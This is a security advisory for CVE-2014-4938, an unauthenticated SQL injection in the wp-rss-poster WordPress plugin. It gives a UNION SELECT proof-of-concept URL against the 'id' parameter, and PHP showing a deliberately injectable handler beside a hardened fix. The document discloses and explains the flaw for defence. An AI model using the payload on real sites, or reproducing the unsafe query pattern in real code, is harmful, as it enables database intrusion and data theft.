wp-plugin : wp-rss-poster

Plugin Details
Plugin Name: wp-plugin : wp-rss-poster
Affected Version : 1.0.0 (and most probably lower versions, if any)
Vulnerability : Injection
Identified by : anantshri
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :

http://localhost/wp-admin/admin.php?page=wrp-add-new&id=2 union select 1,user(),database(),4,5,6,7,8,9,10,11,12,13,14,15,@@version,17,18

Here the parameter "id" is the injection point. The root cause is that the plugin uses the client-supplied value $_GET['id'] directly in its SQL query, without validation or parameterisation.
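To make the root cause concrete, below is an added illustration (not the plugin's actual code): a hypothetical handler that interpolates $_GET['id'] straight into the query, next to a hardened version that casts the value to an integer, binds it through $wpdb->prepare(), and gates the page behind a capability check and nonce. The table name wrp_feeds, the function names and the nonce action name are assumptions for illustration.

```php
<?php
// Added example, not code from the wp-rss-poster plugin.
// Table, function and nonce names are assumed for illustration.

// Hypothetical vulnerable handler: the request value is concatenated into the
// SQL string, so a value like "2 union select ..." is executed as SQL.
function wrp_get_feed_unsafe( $wpdb ) {
    $id  = $_GET['id'];                                               // untrusted
    $sql = "SELECT * FROM {$wpdb->prefix}wrp_feeds WHERE id = $id";   // injectable
    return $wpdb->get_row( $sql );
}

// Hardened handler: only privileged users with a valid nonce reach the query,
// the id is coerced to a non-negative integer, and the value is bound with %d
// so it can never change the structure of the statement.
function wrp_get_feed_safe( $wpdb ) {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges' );
    }
    check_admin_referer( 'wrp_view_feed' );            // assumed nonce action name

    $id = isset( $_GET['id'] ) ? absint( $_GET['id'] ) : 0;
    if ( 0 === $id ) {
        return null;                                   // reject missing/non-numeric ids
    }

    $sql = $wpdb->prepare(
        "SELECT * FROM {$wpdb->prefix}wrp_feeds WHERE id = %d",
        $id
    );
    return $wpdb->get_row( $sql );
}
```

With the hardened version, the PoC value above is reduced by absint() to the integer 2 before it reaches the query, and the prepared placeholder guarantees the remainder of the string is never interpreted as SQL; the capability and nonce checks additionally close the unauthenticated path the advisory notes.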


Disclosure Timeline
Vendor Contacted : 2013-12-23
Plugin Status : Updated on
Public Disclosure : May 28, 2014
CVE Number : CVE-2014-4938
Plugin Description :
Main Features:
1. Easy to create posts from multiple RSS sources.
2. Specify post categories, author, publish date.
3. Customize formats using flexible post templates.
4. Unix cron and WP internal cron jobs for feed update.
5. Cache images in the WordPress Media Library.
6. Twitter and Facebook support.
More info:
* Find out more great WordPress plugins: http://plugins.wp-coder.net/